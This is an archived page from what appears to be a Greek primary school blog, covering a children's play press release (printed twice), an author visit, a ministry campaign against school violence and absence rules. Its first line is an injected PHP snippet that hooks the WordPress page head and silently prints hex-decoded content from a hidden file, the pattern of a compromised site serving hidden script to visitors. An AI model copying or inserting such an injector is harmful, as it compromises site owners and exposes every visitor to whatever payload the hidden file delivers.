if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Φεβρουάριος, 2012 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Φεβρουάριος 2012

ΚΑΡΜΑΝΤΗΛΟΣ, ΤΟ ΔΕΛΤΙΟ ΤΥΠΟΥ ΤΗΣ ΠΑΡΑΣΤΑΣΗΣ

Η ομάδα HIPPO μετά την εμπειρία της περσινής επιτυχίας Η Νάντια και το μαγικό ραβδί
και την ενθουσιώδη ανταπόκριση των παιδιών, επιστρέφει με μια ακόμα πληθωρική
θεατρική πρόταση με τίτλο Καρμάντηλος, του Νίκου Τσιώτσου. Το πρόγραμμα αποτελείται από δύο μέρη:
 

  1. Μία φαντασμαγορική κωμωδία βασισμένη στη σωματικότητα της
    θεατρικής έκφρασης (παντομίμα, σωματοποιημένη αφήγηση), στους ξέφρενους διαλόγους, στη ζωντανή μουσική και το τραγούδι και στη χρήση της κούκλας
    (στοιχεία κουκλοθεάτρου),  με θέμα την σύγκρουση του «θέλω» και του
    «πρέπει», της επιθυμίας και του καθήκοντος .
  2. Ένα σχέδιο δράματος, «Μετά την παράσταση», που βασίζεται στις τεχνικές του Εκπαιδευτικού
    Θεάτρου,
    και επεξεργάζεται τα νοήματα του έργου (παιχνίδι, φαντασία, ελευθερία, πειθαναγκασμός, καταπίεση, εσωτερικό ταξίδι, ελεύθερη βούληση, αυτογνωσία).

 
Διάρκεια παράστασης: 40΄
Διάρκεια παιχνιδιού: 40΄
 
Τιμή: 4? το παιδί
 
Συντελεστές:
Η ομάδα HIPPO αποτελείται από τους:
Φώτη Δούσο, μουσικό, θεατροπαιδαγωγό και Αλέξανδρο Ράπτη, μουσικό, σκηνοθέτη
Παίζουν: Κώστας Βοζίκης, Τάσος Δημητρόπουλος, Ανδρομάχη Μακρίδου.
Κείμενο: Νίκος Τσιώτσος, συγγραφέας, εκπαιδευτικός.
Σχεδιασμός δραστηριοτήτων Εκπαιδευτικού Θεάτρου:
ΗIPPO, Μάρθα Κατσαρίδου,  δρ. ΑΠΘ, εκπαιδευτικός, θεατροπαιδαγωγός,
Καλλιόπη Φύκαρη, θεατροπαιδαγωγός, κάτοχος diploma στο Drama in Education.
Επιμέλεια κίνησης: Χάρης Πεχλιβανίδης, ηθοποιός, performer.
Σκηνικά-Kοστούμια: Κατερίνα Χατζοπούλου,σκηνογράφος, ενδυματολόγος,
Βοηθός Σκηνογράφου: Πετρούλα Λιώρα, σκηνογράφος, ενδυματολόγος.
Μάσκες-κούκλες: Μάρθα Φωκά, σκηνογράφος, ενδυματολόγος.
Μουσική:HIPPO, Κώστας Βοζίκης.
Σκηνοθεσία-θεατρική διασκευή: HIPPO.
Περίληψη
Σε μια μακρινή χώρα  (ίσως όχι και τόσο μακρινή..) την Γκρικαράγουα
όλοι δουλεύουν πυρετωδώς για την διοργάνωση των επίσημων αθλητικών αγώνων.
Ωστόσο τα πράγματα δεν πάνε όσο γρήγορα θέλει ο Καρμάντηλος, ηγέτης της
Γκρικαράγουας, και αυτό του προκαλεί άγχος και κατά συνέπεια αϋπνία και
κατάργηση της αυστηρής του δίαιτας! Τα πράγματα γίνονται ακόμα χειρότερα όταν
από μία παρεξήγηση θεσμοθετείται ένα πρωτοφανές άθλημα: το «άλμα επί κοντών»
και αυτό πυροδοτεί την οργή των Νάνων της Τασνανίας? Οι Νάνοι σαμποτάρουν τις
εργασίες, εξαφανίζοντας όλες τις πίστες των αγωνισμάτων και στήνοντας στην θέση
τους ένα μεγαλοπρεπές λούνα παρκ.  Ο
Καρμάντηλος μετά από έναν νευρικό κλονισμό πάει να ελέγξει την κατάσταση ? και
καταλήγει στην «παγίδα των Νάνων», το τρομερό τρενάκι του τρόμου? Η τρομάρα που
θα πάρει εκεί, θα τον κάνει να αναθεωρήσει τις απόψεις του για τους αγώνες.
Νάνοι, Γίγαντες, πουλιά που μιλούν, γιατροί, νοσοκόμοι,
ελεγκτές εισιτηρίων και πλήθος άλλων προσώπων ερμηνευμένα με κέφι, πάθος,
ευρηματικότητα και τρελό ρυθμό από νέους ταλαντούχους ηθοποιούς.
 
Μετά την παράσταση
Τα παιδιά χωρίζονται σε ομάδες και, με την βοήθεια των
εμψυχωτών υποδύονται ρόλους μέσα από την ιστορία που παρακολούθησαν -Γίγαντες,
Νάνους και Πουλιά-. Μέσα από κινητικά παιχνίδια, ομαδικούς και προσωπικούς
αυτοσχεδιασμούς, τεχνικές του Εκπαιδευτικού Δράματος, τα παιδιά μπαίνουν με
ευφάνταστο και διασκεδαστικό τρόπο στην διάσταση του παραμυθιού και καλούνται
να πάρουν αποφάσεις σε κομβικά σημεία για την εξέλιξη της ιστορίας.
Στόχοι του συγκεκριμένου Εκπαιδευτικού Δράματος είναι να
επανεξεταστούν από τα παιδιά έννοιες όπως σωστο- λάθος, επιθυμία- καθήκον, όρια
της ελευθερίας και καταπίεση. Επίσης να δοθεί η ευκαιρία στα παιδιά να σταθούν
κριτικά απέναντι στην παράσταση που μόλις παρακολούθησαν, να αποκτήσουν μια πιο
συνειδητή άποψη απέναντι στο τι σημαίνει«βλέπω», «προσλαμβάνω», «αποδέχομαι», «απορρίπτω».
? Χωρίς να ξεχνάμε βέβαια ότι ο απώτερος στόχος κάθε
δραστηριότητας Εκπαιδευτικού Δράματος είναι η απόλαυση της συμμετοχικότητας και
της δημιουργίας, το ευεργετικό παιχνίδισμα της φαντασίας με την σωματική
εμπλοκή, η χαρά της δράσης μέσα σε ένα ασφαλές πλαίσιο αποδοχής, αλληλεγγύης
και συναισθηματικής πληρότητας!
 

ΚΑΡΜΑΝΤΗΛΟΣ, ΤΟ ΔΕΛΤΙΟ ΤΥΠΟΥ ΤΗΣ ΠΑΡΑΣΤΑΣΗΣ

Η ομάδα HIPPO μετά την εμπειρία της περσινής επιτυχίας Η Νάντια και το μαγικό ραβδί
και την ενθουσιώδη ανταπόκριση των παιδιών, επιστρέφει με μια ακόμα πληθωρική
θεατρική πρόταση με τίτλο Καρμάντηλος, του Νίκου Τσιώτσου. Το πρόγραμμα αποτελείται από δύο μέρη:

 

  1. Μία φαντασμαγορική κωμωδία βασισμένη στη σωματικότητα της
    θεατρικής έκφρασης (παντομίμα, σωματοποιημένη αφήγηση), στους ξέφρενους διαλόγους, στη ζωντανή μουσική και το τραγούδι και στη χρήση της κούκλας
    (στοιχεία κουκλοθεάτρου),  με θέμα την σύγκρουση του «θέλω» και του
    «πρέπει», της επιθυμίας και του καθήκοντος .
  2. Ένα σχέδιο δράματος, «Μετά την παράσταση», που βασίζεται στις τεχνικές του Εκπαιδευτικού
    Θεάτρου,
    και επεξεργάζεται τα νοήματα του έργου (παιχνίδι, φαντασία, ελευθερία, πειθαναγκασμός, καταπίεση, εσωτερικό ταξίδι, ελεύθερη βούληση, αυτογνωσία).

 

Διάρκεια παράστασης: 40΄

Διάρκεια παιχνιδιού: 40΄

 

Τιμή: 4? το παιδί

 

Συντελεστές:

Η ομάδα HIPPO αποτελείται από τους:

Φώτη Δούσο, μουσικό, θεατροπαιδαγωγό και Αλέξανδρο Ράπτη, μουσικό, σκηνοθέτη

Παίζουν: Κώστας Βοζίκης, Τάσος Δημητρόπουλος, Ανδρομάχη Μακρίδου.

Κείμενο: Νίκος Τσιώτσος, συγγραφέας, εκπαιδευτικός.

Σχεδιασμός δραστηριοτήτων Εκπαιδευτικού Θεάτρου:

ΗIPPO, Μάρθα Κατσαρίδου,  δρ. ΑΠΘ, εκπαιδευτικός, θεατροπαιδαγωγός,

Καλλιόπη Φύκαρη, θεατροπαιδαγωγός, κάτοχος diploma στο Drama in Education.

Επιμέλεια κίνησης: Χάρης Πεχλιβανίδης, ηθοποιός, performer.

Σκηνικά-Kοστούμια: Κατερίνα Χατζοπούλου,σκηνογράφος, ενδυματολόγος,

Βοηθός Σκηνογράφου: Πετρούλα Λιώρα, σκηνογράφος, ενδυματολόγος.

Μάσκες-κούκλες: Μάρθα Φωκά, σκηνογράφος, ενδυματολόγος.

Μουσική:HIPPO, Κώστας Βοζίκης.

Σκηνοθεσία-θεατρική διασκευή: HIPPO.

Περίληψη

Σε μια μακρινή χώρα  (ίσως όχι και τόσο μακρινή..) την Γκρικαράγουα
όλοι δουλεύουν πυρετωδώς για την διοργάνωση των επίσημων αθλητικών αγώνων.
Ωστόσο τα πράγματα δεν πάνε όσο γρήγορα θέλει ο Καρμάντηλος, ηγέτης της
Γκρικαράγουας, και αυτό του προκαλεί άγχος και κατά συνέπεια αϋπνία και
κατάργηση της αυστηρής του δίαιτας! Τα πράγματα γίνονται ακόμα χειρότερα όταν
από μία παρεξήγηση θεσμοθετείται ένα πρωτοφανές άθλημα: το «άλμα επί κοντών»
και αυτό πυροδοτεί την οργή των Νάνων της Τασνανίας? Οι Νάνοι σαμποτάρουν τις
εργασίες, εξαφανίζοντας όλες τις πίστες των αγωνισμάτων και στήνοντας στην θέση
τους ένα μεγαλοπρεπές λούνα παρκ.  Ο
Καρμάντηλος μετά από έναν νευρικό κλονισμό πάει να ελέγξει την κατάσταση ? και
καταλήγει στην «παγίδα των Νάνων», το τρομερό τρενάκι του τρόμου? Η τρομάρα που
θα πάρει εκεί, θα τον κάνει να αναθεωρήσει τις απόψεις του για τους αγώνες.

Νάνοι, Γίγαντες, πουλιά που μιλούν, γιατροί, νοσοκόμοι,
ελεγκτές εισιτηρίων και πλήθος άλλων προσώπων ερμηνευμένα με κέφι, πάθος,
ευρηματικότητα και τρελό ρυθμό από νέους ταλαντούχους ηθοποιούς.

 

Μετά την παράσταση

Τα παιδιά χωρίζονται σε ομάδες και, με την βοήθεια των
εμψυχωτών υποδύονται ρόλους μέσα από την ιστορία που παρακολούθησαν -Γίγαντες,
Νάνους και Πουλιά-. Μέσα από κινητικά παιχνίδια, ομαδικούς και προσωπικούς
αυτοσχεδιασμούς, τεχνικές του Εκπαιδευτικού Δράματος, τα παιδιά μπαίνουν με
ευφάνταστο και διασκεδαστικό τρόπο στην διάσταση του παραμυθιού και καλούνται
να πάρουν αποφάσεις σε κομβικά σημεία για την εξέλιξη της ιστορίας.

Στόχοι του συγκεκριμένου Εκπαιδευτικού Δράματος είναι να
επανεξεταστούν από τα παιδιά έννοιες όπως σωστο- λάθος, επιθυμία- καθήκον, όρια
της ελευθερίας και καταπίεση. Επίσης να δοθεί η ευκαιρία στα παιδιά να σταθούν
κριτικά απέναντι στην παράσταση που μόλις παρακολούθησαν, να αποκτήσουν μια πιο
συνειδητή άποψη απέναντι στο τι σημαίνει«βλέπω», «προσλαμβάνω», «αποδέχομαι», «απορρίπτω».

? Χωρίς να ξεχνάμε βέβαια ότι ο απώτερος στόχος κάθε
δραστηριότητας Εκπαιδευτικού Δράματος είναι η απόλαυση της συμμετοχικότητας και
της δημιουργίας, το ευεργετικό παιχνίδισμα της φαντασίας με την σωματική
εμπλοκή, η χαρά της δράσης μέσα σε ένα ασφαλές πλαίσιο αποδοχής, αλληλεγγύης
και συναισθηματικής πληρότητας!

 

Παιδική Λογοτεχνία με την Βούλα Μάστορη

IMG_2857.JPG Το Δημοτικό Σχολείο Λεωνιδίου φιλοξενεί στα πλαίσια του προγράμματος “Φιλαναγνωσίας” την κα Βούλα Μάστορη.

Τα παιδιά του Δημοτικού Σχολείου, στις 28-29/02/2012, θα έχουν την ευκαιρία να συνδιαλεχθούν με την συγγραφέα πολλών παιδικών βιβλίων που έχουν διαβάσει.

Παράλληλα στις 28/02/2012 στις 18:30 στην Δημοτική Βιβλιοθήκη θα πραγματοποιηθεί συνάντηση με τους γονείς των μαθητών.

Η εκδήλωση γίνεται με την ενεργή συμμετοχή του Συλλόγου Γονέων και Κηδεμόνων του Δημοτικού Σχολείου Λεωνιδίου.

 

 

Λέξεις Κλειδιά σε αναζητήσεις:

Δράσεις κατά της βίας στο Σχολείο την 6η Μαρτίου

To Υπουργείο Παιδείας, Διά Βίου Μάθησης και Θρησκευμάτων, σε θέματα πρόληψης και προαγωγής της υγείας των μαθητών/τριών, έχει δημιουργήσει στο πλαίσιο της Διεύθυνσης Συμβουλευτικού Επαγγελματικού Προσανατολισμού και Εκπαιδευτικών Δραστηριοτήτων(ΣΕΠΕΔ) το τμήμα Αγωγής Υγείας και Περιβαλλοντικής Αγωγής. Επιπλέον, έχει δημιουργήσει δίκτυο Υπευθύνων Σχολικών Δραστηριοτήτων σε όλες τις Διευθύνσεις Α/θμιας και Β/θμιας Εκπαίδευσης της χώρας.

Έργο των παραπάνω είναι η εφαρμογή, η παρακολούθηση και η εξάπλωση των προγραμμάτων Αγωγής Υγείας στα σχολεία Α/θμιας και Β/θμιας Εκπ/σης όλης της χώρας. Ένα από τα θέματα της Αγωγής Υγείας είναι ο εκφοβισμός και η ενδοσχολική βία.

Το Υπουργείο Παιδείας, ιδιαίτερα ευαισθητοποιημένο σε θέματα ενδοσχολικής βίας, προχώρησε στην σύνταξη συμφώνου συνεργασίας  «για την ανάπτυξη πρωτοβουλιών και δράσεων με στόχο την πρόληψη και αντιμετώπιση του εκφοβισμού και της βίας μεταξύ των μαθητών στο σχολείο»  με το Επιστημονικό Σωματείο υπό την επωνυμία «Εταιρεία Ψυχοκοινωνικής Υγείας του Παιδιού και του Εφήβου» (Ε.Ψ.Υ.Π.Ε.), Επιστημονικός Υπεύθυνος της οποίας είναι ο Καθηγητής Παιδοψυχιατρικής της Ιατρικής Σχολής του Πανεπιστημίου Αθηνών, κ. Ιωάννης Τσιάντης.

Επιπροσθέτως  το Υπουργείο  Παιδείας συμμετέχει στο Δίκτυο κατά της βίας στο Σχολείο στο οποίο είναι μέλη οι Κυβερνητικοί και μη φορείς: η Εταιρεία  Ψυχοκοινωνικής  Υγείας  του Παιδιού  και του Εφήβου, το, η Γενική  Γραμματεία  Νέας  Γενιάς, ο Συνήγορος  του  Πολίτη  με την ιδιότητά του ως Συνήγορος του Παιδιού, η Παιδοψυχιατρική  Εταιρεία Ελλάδος-Ένωση  Ψυχιάτρων  Παιδιών  και Εφήβων, η Πανεπιστημιακή Παιδοψυχιατρική Κλινική Νοσοκομείο Παίδων «Η ΑΓΙΑ ΣΟΦΙΑ», το Παιδαγωγικό Τμήμα Δημοτικής Εκπαίδευσης  Πανεπιστημίου  Αθηνών, το Παιδαγωγικό Τμήμα Δημοτικής  Εκπαίδευσης  Αριστοτελείου  Πανεπιστημίου, το Ινστιτούτο  Υγείας του Παιδιού  Διεύθυνση Ψυχικής  Υγείας και Κοινωνικής  Πρόνοιας, το Ίδρυμα ΜΑΡΑΓΚΟΠΟΥΛΟΥ για τα δικαιώματα του ανθρώπου, το Ελληνικό τμήμα της  ΙΒΒΥ – Kύκλος Ελληνικού Παιδικού Βιβλίου .

Ένας από τους σκοπούς του Δικτύου είναι η ευαισθητοποίηση μαθητών, γονέων και ολόκληρης της κοινωνίας σχετικά με το φαινόμενο, και η καθιέρωση της Πανελλήνιας Ημέρας κατά της Βίας στο Σχολείο την 6η  Μαρτίου .

Η  ημέρα αυτή  αποτελεί μια αφορμή για εκπαιδευτικούς, μαθητές και γονείς των σχολείων όλης της χώρας να ανταλλάξουν σκέψεις, πληροφορίες, ερεθίσματα και ιδέες για την πρόληψη και αντιμετώπιση της σχολικής βίας που εκδηλώνεται μεταξύ μαθητών και να σχεδιάσουν και υλοποιήσουν μακροχρόνια προγράμματα πρόληψης και αντιμετώπισης.

Την Ημέρα κατά της Βίας στο Σχολείο καλούνται όλα τα σχολεία Α? βάθμιας και Β? Βάθμιας εκπαίδευσης να αφιερώσουν χρόνο (δύο ή περισσότερες διδακτικές ώρες με απόφαση του συλλόγου διδασκόντων ) σε δράσεις ? συζητήσεις ? εκδηλώσεις κατά του σχολικού εκφοβισμού με στόχο την ευαισθητοποίηση των σχολικών κοινοτήτων και την επαγρύπνηση όλων των μελών τους για την έγκαιρη παρέμβαση, ώστε να περιοριστούν οι δίαυλοι εκδήλωσης της βίας στη ζωή των ανηλίκων και να αποτραπούν οι αρνητικές της συνέπειες στις διαπροσωπικές τους σχέσεις.

 

Η προετοιμασία για την ημέρα κατά της Βίας στο Σχολείο  πρέπει να αρχίσει έγκαιρα με πρωτοβουλία των εκπαιδευτικών των σχολείων ενώ  η συμμετοχή των μαθητών πρέπει να είναι η μεγαλύτερη δυνατή.

 

Τι μπορούμε να κάνουμε στα σχολεία την 6η Μαρτίου;

 

–          Συζητήσεις ανάμεσα στους μαθητές στις τάξεις με θέμα «Πως εκδηλώνεται η βία ανάμεσα στα παιδιά, τι μπορεί να κάνει η τάξη μας / το σχολείο μας για να περιοριστούν και να αντιμετωπίζονται καλύτερα τα περιστατικά βίας;» Στις συζητήσεις είναι σκόπιμο να ακούγεται η γνώμη των μαθητών για τα αίτια και τους τρόπους εκδήλωσης της βίας και να προκύπτουν ιδέες για εναλλακτικούς τρόπους πρόληψης, αντιμετώπισης, ανάληψη ευθυνών και ρόλων, ανάλογα με τις ειδικές συνθήκες του κάθε σχολείου.

–          Βιβλιοπαρουσιάσεις και συζητήσεις μεταξύ μαθητών, με αφορμή βιβλία που αναφέρονται στην σχολική βία, ύστερα από κατάλληλη προεργασία, με την ανάληψη παρουσιάσεων από τους ίδιους τους μαθητές.

–          Προβολές ταινιών συναφούς θεματολογίας, που ανταποκρίνονται στο ηλικιακό και γνωστικό επίπεδο των μαθητών, ακολουθούμενες από σχετικές συζητήσεις και περαιτέρω δράσεις

–          Δημιουργία αφισών ή/και φυλλαδίων με μηνύματα και πληροφορίες κατά της βίας, χρησιμοποιώντας κολλάζ, ζωγραφική και άλλα εργαλεία των νέων τεχνολογιών

–          Εικαστικά εργαστήρια με δημιουργίες των μαθητών σχετικά με τη βία, ακολουθούμενα από συζήτηση και έκθεση των έργων σε χώρους του σχολείου, πιθανά δε και με δημιουργία σχετικών τοιχογραφιών σε επιλεγμένους χώρους της σχολικής μονάδας

–          Παρουσιάσεις σχετικά με επιμέρους άξονες της θεματολογίας, από ομάδες μαθητών σχολείων, βασισμένες σε έρευνες υλικού από το διαδίκτυο, συζητήσεις, συμπλήρωση ερωτηματολογίων, καταγραφή απόψεων και αξιοποίηση σύγχρονων μέσων επικοινωνίας και νέων τεχνολογιών

–          Θεατρικά, μουσικά ή/και χορευτικά δρώμενα, σε σχολικές μονάδες όπου υπάρχουν εκπαιδευτικοί με εξειδικευμένη επιμόρφωση, ώστε να αναδειχθούν θέματα σχετικά με την πρόληψη και αντιμετώπιση και ειρηνική επίλυση της βίας.

–          Αναρτήσεις στο διαδίκτυο, σε σχολικά sites / blogs, αναφορικά με δράσεις και έρευνες σχετικά με το φαινόμενο

–          Συναντήσεις Σχολικών Συμβουλίων και Υπευθύνων Αγωγής Υγείας-Σχολικών δραστηριοτήτων με συμμετοχή εκπροσώπων των εκπαιδευτικών, των μαθητών και των γονέων, με θέμα την βελτίωση της λειτουργίας της σχολικής μονάδας, με στόχο τη συστηματική πρόληψη και ήπια, ειρηνική και ουσιαστική αντιμετώπιση περιστατικών βίας.

–          Πραγματοποίηση διαδραστικών ομιλιών και βιωματικών σεμιναρίων για το φαινόμενο από εξειδικευμένους επιστήμονες σε ομάδες γονέων, εκπαιδευτικών και μαθητών, σε χρόνο εκτός της λειτουργίας του σχολείου

Στον ειδικό ιστοχώρο: www.antibullyingnetwork.gr, που έχει δημιουργήσει το  Δίκτυο κατά της Βίας στο Σχολείο, προβάλλεται σχετικό ενημερωτικό και εκπαιδευτικό υλικό, βιβλιογραφία και προτεινόμενες ταινίες. Επίσης, παρουσιάζονται φορείς, δράσεις και καλές πρακτικές από διάφορα σχολεία και περιοχές της χώρας, βίντεο, συνδέσεις και άλλες χρήσιμες πληροφορίες για το φαινόμενο, που μπορούν να αξιοποιηθούν από εκπαιδευτικούς, γονείς και τους μαθητές.

Παράλληλα :

  • Το Δίκτυο με χρηματοδότηση της Γενικής Γραμματείας Νέας Γενιάς θα εκδώσει και θα διανείμει μέσω του Υπουργείου Παιδείας στα σχολεία αφίσα με σύνθημα Αναγνωρίζω Αρνούμαι Αντιδρώ στη βία στο σχολείο για την Πανελλήνια Ημέρα κατά της Βίας στα Σχολεία.
  • Η Γενική Γραμματεία Νέας Γενιάς αναλαμβάνει και την πρωτοβουλία διοργάνωσης διαδικτυακής εκδήλωσης, με συμμετοχή φορέων του “Δικτύου κατά της Βίας στα Σχολεία”, με σκοπό την ευαισθητοποίηση και την ενημέρωση του κοινού σχετικά με το φαινόμενο του ενδοσχολικού εκφοβισμού (bullying), δίδοντας ιδιαίτερη έμφαση στους γονείς, τους μαθητές και τους εκπαιδευτικούς. Επισημαίνεται ότι η διαδικτυακή εκδήλωση θα λάβει χώρα στην Αθήνα και θα μεταδοθεί διαδικτυακά (live streaming) μέσω του καναλιού που διαθέτει η Γενική Γραμματεία Νέας Γενιάς στο www.youtube.gr. Κατά τη διάρκεια της διαδικτυακής εκδήλωσης θα απαντηθούν από τα μέλη του Δικτύου ερωτήματα των ενδιαφερομένων, τα οποία θα έχουν υποβληθεί στη Γενική Γραμματεία Νέας Γενιάς. Για το λόγο αυτό προτείνεται στους εκπαιδευτικούς η παρότρυνση των μαθητών να επισκεφθούν τον ιστότοπο της Γενικής Γραμματείας Νέας Γενιάς (www.neagenia.gr) για την παροχή πληροφοριών σχετικά με την παρακολούθηση της εκδήλωσης και την υποβολή ερωτημάτων.

 

 

 

 

ΑΠΟΥΣΙΕΣ ΜΑΘΗΤΩΝ

Με βάση τους κανονισμούς λειτουργίας σχολείων, οποιαδήποτε απουσία μαθητή από το σχολείο αιτιολογείται με βεβαίωση από το γονιό ή τον κηδεμόνα. Όταν μαθητής απουσιάσει πάνω από τρεις μέρες για λόγους υγείας πρέπει να παρουσιάσει πιστοποιητικό γιατρού,εκτός αν ο διευθυντής του σχολείου έχει βεβαιωθεί γι’αυτό από δική του έρευνα. Αν ο μαθητής απουσιάσει από το σχολείο έξι συνεχόμενες μέρες, ή απουσιάζει συστηματικά χωρίς σοβαρό λόγο,ο διευθυντής του σχολείου ειδοποιεί αμέσως το Διευθυντή Δημοτικής Εκπαίδευσης για τυχόν παραβάσεις του Νόμου περί υποχρεωτικής Εκπαίδευσης. Επίσης, από τη φετινή χρονιά, σύμφωνα με οδηγίες του Υπουργείου Παιδείας και Πολιτισμού, απαιτείται να ενημερώνετε έγκαιρα το σχολείο (π.χ από την προηγούμενη ή το πρωί της ίδιας ημέρας, έστω κι αν η απουσία είναι μόνο για μια μέρα ή μερικές ώρες) ότι το παιδί σας θα απουσιάσει. Αυτό μπορεί να γίνει είτε τηλεφωνικώς, είτε γραπτώς, είτε κατ’ ιδίαν

Λέξεις Κλειδιά σε αναζητήσεις: